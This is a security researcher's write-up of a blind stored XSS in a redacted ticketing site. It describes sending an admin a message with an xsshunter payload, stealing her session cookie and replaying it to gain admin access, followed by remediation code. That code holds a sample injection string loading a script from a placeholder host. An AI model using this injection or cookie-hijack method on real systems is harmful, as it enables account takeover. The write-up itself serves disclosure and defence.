IT Security Enthusiast • Bug Hunter • Penetration Tester

Blind Stored XSS and Hijack Admin Login


Description

Blind Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

If an attacker can control a script that is executed in the victim’s browser, then they can typically fully compromise that user. The attacker can carry out any of the actions that are applicable to the impact of reflected XSS vulnerabilities.

In terms of exploitability, the key difference between reflected and stored XSS is that a stored XSS vulnerability enables attacks that are self-contained within the application itself. The attacker does not need to find an external way of inducing other users to make a particular request containing their exploit. Rather, the attacker places their exploit into the application itself and simply waits for users to encounter it.

Affected Endpoint

  • https://[redacted]/ticket/dashboard/baca?route=inbox&r=[redacted]
  • https://[redacted]/admin/ticket/baca?route=inbox&r=[redacted]

Impact

  • If an attacker can control a script that is executed in the victim’s browser, they can typically fully compromise that user.
  • Stealing the user’s credentials (session cookie).
  • Logging in as a different user (another user or an admin).
  • Stealing information from another user’s or the admin’s account.

Steps to Reproduce

  • The concept.
[Image: Concept of Stored XSS Attack]
  • I log in as a user account.
  • Go to the “Tanya Jawab” page > “Hubungi Admin” > choose one admin > send her a “malicious” message.
  • To make a malicious message, I use the feature of https://xsshunter.com and the payload is:
  • And I pretended to ask a question (a random question).
  • Intercept the request with Burp and look at the response: it contains the HTML tag that will be sent, and at this stage I assume that we can send malicious code to our destination email (in this case the admin’s email).
[Image: HTML tag appears in the content]
[Image: Insert malicious code from https://xsshunter.com]
  • The injection phase is finished; now it’s just a matter of time until the admin opens an email from me containing the malicious code.
[Image: Injection phase finished; an error appears after “> (a good sign)]
  • After waiting about 2-3 days, I got an email notification stating that the admin had opened the email I sent and the code had been triggered! YAY!
[Image: Email notification from xsshunter.com]
  • After successfully stealing the admin’s cookies, the last step is to replace the cookies in your own user session with the stolen ones and reload; the application then treats you as the admin account.

Remediation

To keep yourself safe from XSS, you must sanitize your input and encode your output. Your application code should never output data received as input directly to the browser without checking it for malicious code and HTML-encoding it for the context in which it is rendered.
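As an added example (not code from the original post or the affected application), here is the output-encoding fix the remediation calls for, applied to a hypothetical admin inbox renderer like the “Hubungi Admin” page, alongside an HttpOnly session cookie that blunts the cookie-theft impact described above. The function names and the sample message are assumptions.

```javascript
// Added example (not the original post's code). Names such as renderInboxRow
// and sessionCookieHeader are hypothetical.

// Encode the five characters that let text break out of an HTML text node
// or a double-quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable rendering: the stored message body is concatenated straight into
// the admin's inbox HTML, so a stored payload executes when the admin opens it.
function renderInboxRowUnsafe(msg) {
  return `<tr><td>${msg.sender}</td><td>${msg.body}</td></tr>`;
}

// Hardened rendering: every untrusted field is HTML-encoded at output time,
// so the same stored text is displayed literally instead of being parsed.
function renderInboxRow(msg) {
  return `<tr><td>${escapeHtml(msg.sender)}</td><td>${escapeHtml(msg.body)}</td></tr>`;
}

// Second layer against the cookie-theft impact: a session cookie that page
// scripts cannot read, so even an executed payload cannot exfiltrate it.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed sample message of the kind a user could submit to an admin
// (the probe host is a placeholder, not a real endpoint).
const sampleMessage = {
  sender: 'user123',
  body: 'Pertanyaan"><script src="https://xss-probe.invalid/probe.js"></script>',
};

// Detection helper for a quick regression check: does rendered HTML still
// contain a live <script> tag?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe row executes script:', containsLiveScript(renderInboxRowUnsafe(sampleMessage)));
console.log('hardened row executes script:', containsLiveScript(renderInboxRow(sampleMessage)));
```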
